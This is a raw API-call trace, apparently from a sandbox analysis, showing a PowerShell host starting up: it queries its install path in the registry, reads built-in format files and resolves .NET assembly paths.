	[0763.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0763.556] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0763.556] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da290
	[0763.556] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da290, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0763.556] CoTaskMemFree (pv=0x1b3da290) 
	[0763.556] RegCloseKey (hKey=0x310) returned 0x0
	[0763.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.557] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x778dbb49, Data2=0xf693, Data3=0x4fbd, Data4=([0]=0xa3, [1]=0xd2, [2]=0x57, [3]=0xf, [4]=0x78, [5]=0x96, [6]=0x3d, [7]=0x9e))) returned 0x0
	[0763.562] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe84709e7, Data2=0xe07a, Data3=0x47a1, Data4=([0]=0xb7, [1]=0xea, [2]=0xb7, [3]=0x5c, [4]=0x26, [5]=0x29, [6]=0xf9, [7]=0xac))) returned 0x0
	[0763.563] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x19c003b0, Data2=0x2619, Data3=0x4264, Data4=([0]=0x8b, [1]=0xd3, [2]=0xa6, [3]=0xb2, [4]=0xc5, [5]=0x92, [6]=0x27, [7]=0xef))) returned 0x0
	[0763.564] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x940b3f92, Data2=0x8680, Data3=0x4a05, Data4=([0]=0xbf, [1]=0x6, [2]=0xa2, [3]=0x26, [4]=0xf8, [5]=0x30, [6]=0x8, [7]=0x11))) returned 0x0
	[0763.565] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa3806ebf, Data2=0xefba, Data3=0x445b, Data4=([0]=0x9e, [1]=0x6f, [2]=0x8c, [3]=0x49, [4]=0x9c, [5]=0x26, [6]=0xbf, [7]=0xda))) returned 0x0
	[0763.565] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa3295b89, Data2=0xc60f, Data3=0x4e2e, Data4=([0]=0x87, [1]=0xa1, [2]=0x9a, [3]=0x43, [4]=0x4f, [5]=0xaf, [6]=0x91, [7]=0xe5))) returned 0x0
	[0763.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.566] SetErrorMode (uMode=0x1) returned 0x1
	[0763.566] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0763.566] GetFileType (hFile=0x310) returned 0x1
	[0763.566] SetErrorMode (uMode=0x1) returned 0x1
	[0763.567] GetFileType (hFile=0x310) returned 0x1
	[0763.567] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.567] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.567] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.568] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.569] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.569] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.569] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0xaca, lpOverlapped=0x0) returned 1
	[0763.569] ReadFile (in: hFile=0x310, lpBuffer=0x3115eea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3115eea*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0763.569] ReadFile (in: hFile=0x310, lpBuffer=0x31168b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31168b8*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0763.569] CloseHandle (hObject=0x310) returned 1
	[0763.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.570] SetErrorMode (uMode=0x1) returned 0x1
	[0763.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0763.570] SetErrorMode (uMode=0x1) returned 0x1
	[0763.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.570] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0763.570] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0763.570] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da290
	[0763.571] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da290, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0763.571] CoTaskMemFree (pv=0x1b3da290) 
	[0763.571] RegCloseKey (hKey=0x310) returned 0x0
	[0763.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0763.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0764.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0764.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0764.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0764.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0764.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0764.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0764.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0764.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0764.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0764.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0764.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0764.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0764.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0764.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0764.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0766.114] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xcebd01a3, Data2=0x2f1e, Data3=0x4192, Data4=([0]=0x8d, [1]=0x2b, [2]=0xe7, [3]=0x56, [4]=0x3e, [5]=0x1b, [6]=0x32, [7]=0x62))) returned 0x0
	[0766.114] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1803ca0, Data2=0xc722, Data3=0x4bea, Data4=([0]=0xb8, [1]=0xbd, [2]=0x5d, [3]=0xd7, [4]=0x11, [5]=0xa3, [6]=0xe4, [7]=0xfd))) returned 0x0
	[0766.114] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x5f4819fa, Data2=0xed23, Data3=0x4948, Data4=([0]=0x8b, [1]=0xec, [2]=0x30, [3]=0xd0, [4]=0x9c, [5]=0xfc, [6]=0xc6, [7]=0x4a))) returned 0x0
	[0766.115] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe98eac8d, Data2=0x3e65, Data3=0x4dce, Data4=([0]=0xb4, [1]=0xba, [2]=0x55, [3]=0xea, [4]=0x6a, [5]=0x79, [6]=0x3d, [7]=0x34))) returned 0x0
	[0766.115] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x54f046ae, Data2=0x4c68, Data3=0x4719, Data4=([0]=0xa3, [1]=0xb1, [2]=0x35, [3]=0x5b, [4]=0x73, [5]=0xb0, [6]=0xc2, [7]=0xfd))) returned 0x0
	[0766.116] VirtualQuery (in: lpAddress=0x1eb330, lpBuffer=0x1ec1f0, dwLength=0x30 | out: lpBuffer=0x1ec1f0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0766.116] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf251fced, Data2=0xb5c8, Data3=0x4050, Data4=([0]=0xbb, [1]=0x7c, [2]=0x47, [3]=0x34, [4]=0xd1, [5]=0x34, [6]=0x9b, [7]=0x45))) returned 0x0
	[0766.116] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb5c9fd38, Data2=0x8145, Data3=0x4241, Data4=([0]=0x99, [1]=0xa8, [2]=0xab, [3]=0x63, [4]=0xde, [5]=0x78, [6]=0x3a, [7]=0xb9))) returned 0x0
	[0766.116] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0766.116] GetFileType (hFile=0x310) returned 0x1
	[0766.116] SetErrorMode (uMode=0x1) returned 0x1
	[0766.117] GetFileType (hFile=0x310) returned 0x1
	[0766.117] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.117] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.117] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.117] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.117] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.118] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.118] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.118] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.120] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.120] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.121] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.121] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.121] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.122] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.122] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.122] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.126] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0766.126] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0xbce, lpOverlapped=0x0) returned 1
	[0766.126] ReadFile (in: hFile=0x310, lpBuffer=0x31c85e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c85e6*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0766.126] ReadFile (in: hFile=0x310, lpBuffer=0x31c8eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31c8eb0*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0766.126] CloseHandle (hObject=0x310) returned 1
	[0766.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.127] SetErrorMode (uMode=0x1) returned 0x1
	[0766.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
